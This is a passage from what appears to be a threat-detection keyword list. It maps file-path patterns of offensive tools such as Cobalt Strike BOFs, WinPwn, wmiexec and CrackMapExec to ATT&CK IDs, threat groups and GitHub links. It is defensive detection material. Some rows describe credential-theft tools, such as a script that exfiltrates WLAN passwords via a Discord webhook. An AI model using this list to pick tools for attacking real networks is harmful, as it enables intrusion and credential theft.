T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z -*/win/Tor/tor.exe*,offensive_tool_keyword,Tor,Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion - Data Exfiltration,https://github.com/r0oth3x49/Tor,1,1,N/A,N/A,2,148,44,2018-04-21T10:55:00Z,2016-09-22T11:22:33Z -*/Win7ElevateDll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/WinBruteLogon*,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,1,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z -*/win-brute-logon*,offensive_tool_keyword,win-brute-logon,Bruteforce cracking tool for windows users,T1110 - T1110.001 - T1110.002,TA0008 - TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/DarkCoderSc/win-brute-logon,1,1,N/A,N/A,10,1026,184,2022-12-27T12:06:40Z,2020-05-14T21:46:50Z -*/windapsearch.git*,offensive_tool_keyword,windapsearch,Python script to enumerate users - groups and computers from a Windows domain through LDAP queries,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/ropnop/windapsearch,1,1,N/A,N/A,7,666,134,2022-04-20T07:40:42Z,2016-08-10T21:43:30Z -*/windapsearch_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/windows/dcerpc*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/windows_autologin.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/windows-login-phish*,offensive_tool_keyword,windows-login-phish,Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes,T1566,N/A,N/A,N/A,Phishing,https://github.com/CipherKill/windows-login-phish,1,1,N/A,N/A,1,17,5,2022-03-25T05:49:01Z,2022-03-13T20:02:15Z -*/windows-lpe-template*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/Windows-Passwords.ps1*,offensive_tool_keyword,WLAN-Windows-Passwords,Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.,T1056.005 - T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*/windows-resources/hyperion*,offensive_tool_keyword,hyperion,A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds),T1027.002 - T1059.001 - T1116,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://www.kali.org/tools/hyperion/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*/WindowsVault.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/WindowsVault.h*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/win-enum-resources*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/WinPwn*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*/WinPwn.git*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*/WinPwn_Repo*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*/WinPwnage*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/winregistry.py**,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/winrm.cpp*,offensive_tool_keyword,cobaltstrike,C++ WinRM API via Reflective DLL,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mez-0/winrmdll,1,1,N/A,10,10,138,27,2021-09-11T13:44:16Z,2021-09-11T13:40:22Z -*/winrm.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/winrmdll*,offensive_tool_keyword,cobaltstrike,C++ WinRM API via Reflective DLL,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mez-0/winrmdll,1,1,N/A,10,10,138,27,2021-09-11T13:44:16Z,2021-09-11T13:40:22Z -*/winrm-reflective-dll/*,offensive_tool_keyword,cobaltstrike,C++ WinRM API via Reflective DLL,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mez-0/winrmdll,1,1,N/A,10,10,138,27,2021-09-11T13:44:16Z,2021-09-11T13:40:22Z -*/Winsocky.git*,offensive_tool_keyword,cobaltstrike,Winsocket for Cobalt Strike.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/WKL-Sec/Winsocky,1,1,N/A,10,10,79,13,2023-07-06T11:47:18Z,2023-06-22T07:00:22Z -*/wiresocks.git*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,1,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z -*/wmeye/*,offensive_tool_keyword,WMEye,WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement,T1210 - T1570,TA0001 - TA0002 - TA0003 - TA0004 - TA0009,N/A,N/A,POST Exploitation tools,https://github.com/pwn1sher/WMEye,1,1,N/A,N/A,4,334,54,2021-12-24T05:38:50Z,2021-09-07T08:18:30Z -*/WMI Lateral Movement/*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*/wmi.dropper*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/WMI/wmi.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/wmiexec.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/wmiexec/*,offensive_tool_keyword,wmiexec,Set of python scripts which perform different ways of command execution via WMI protocol,T1047 - T1059 - T1070 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/WKL-Sec/wmiexec,1,1,N/A,N/A,2,145,21,2023-06-29T03:30:09Z,2023-06-21T13:15:04Z -*/wmiexec2.git*,offensive_tool_keyword,wmiexec2,wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*/wmiexec-Pro*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,1,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*/wmisploit*,offensive_tool_keyword,Wmisploit,WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.,T1087 - T1059.001 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/secabstraction/WmiSploit,1,1,N/A,N/A,2,163,39,2015-08-28T23:56:00Z,2015-03-15T03:30:02Z -*/word_list.c,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/word_list.h,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/wordlists/owa_directories.txt*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*/wordlists/skype-directories.txt*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*/workflow/test/dirbscan.yaml*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,1,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*/wpaf/finder.py*,offensive_tool_keyword,wpaf,WordPress admin finder,T1596,TA0007,N/A,N/A,Web Attacks,https://github.com/kancotdiq/wpaf,1,0,N/A,N/A,1,51,8,2018-07-12T04:55:58Z,2018-07-11T18:09:11Z -*/wsdd-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ws-dirs.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*/ws-files.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*/WSPCoerce.git*,offensive_tool_keyword,WSPCoerce,PoC to coerce authentication from Windows hosts using MS-WSP,T1557.001 - T1078.003 - T1059.003,TA0006 - TA0004 - TA0002,N/A,N/A,Exploitation tools,https://github.com/slemire/WSPCoerce,1,0,N/A,9,3,202,29,2023-09-07T14:43:36Z,2023-07-26T17:20:42Z -*/wwlib/lolbins/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike payload generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dr0op/CrossNet-Beta,1,1,N/A,10,10,352,56,2022-07-18T06:23:16Z,2021-02-08T10:52:39Z -*/www/exploit.html*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed,1,1,N/A,N/A,4,387,57,2023-04-13T16:46:26Z,2022-06-02T12:33:18Z -*/x0rz/*,offensive_tool_keyword,Github Username,github repo username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/x0rz,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/x11-access.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/x64_slim.dll*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by 